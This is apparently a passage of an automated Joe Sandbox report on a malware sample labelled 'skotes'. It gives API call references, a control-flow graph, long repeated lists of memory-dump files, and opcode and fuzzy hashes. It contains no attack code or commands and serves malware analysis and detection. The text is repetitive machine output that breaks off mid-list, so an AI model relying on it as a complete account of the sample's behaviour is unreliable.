                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 041bbee0b1dffe994665d17aad15fa3e62b368db600a03196174c3bdb9d6cd34
                                                                                                                                                                                                                                                  • Instruction ID: faab343a9dccc20028c99d05f8d55d41bc97a52e0bb14c2bb7e51f3b398573cd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 041bbee0b1dffe994665d17aad15fa3e62b368db600a03196174c3bdb9d6cd34
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70219B327052009BEB089B6DDC89B6DB762EBC1330F344219E454EB3E0C7368980EB52

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 351 f6d82f-f6d83a 352 f6d83c-f6d846 351->352 353 f6d848-f6d84e 351->353 352->353 354 f6d87c-f6d887 call f675f6 352->354 355 f6d867-f6d878 RtlAllocateHeap 353->355 356 f6d850-f6d851 353->356 362 f6d889-f6d88b 354->362 358 f6d853-f6d85a call f69dc0 355->358 359 f6d87a 355->359 356->355 358->354 364 f6d85c-f6d865 call f68e36 358->364 359->362 364->354 364->355
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F6A813,00000001,00000364,00000006,000000FF,?,00F6EE3F,?,00000004,00000000,?,?), ref: 00F6D871
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 76549611b639777267c271f67a6b8eebb84af3d09e6c87a3332b2afc62a94b7b
                                                                                                                                                                                                                                                  • Instruction ID: 2c2cdab00741be58679442f6909e765d2a00a8476e599d71f1a10ffd9a62cdbf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76549611b639777267c271f67a6b8eebb84af3d09e6c87a3332b2afc62a94b7b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF08232F4522566EB216B769D09B5F7759DF857B0B188122ED08A7182DA34EC01B6E0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 32384418-0
                                                                                                                                                                                                                                                  • Opcode ID: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
                                                                                                                                                                                                                                                  • Instruction ID: 3089a5aec9e6a53e9c6edacf01078283c59a47b3d893d3a4e1a7824c5b79c9ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66A1DFB1E01205AFDB24EF64CD4476ABBA8FF15334F048169E816D7241EB79EA04EBD1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
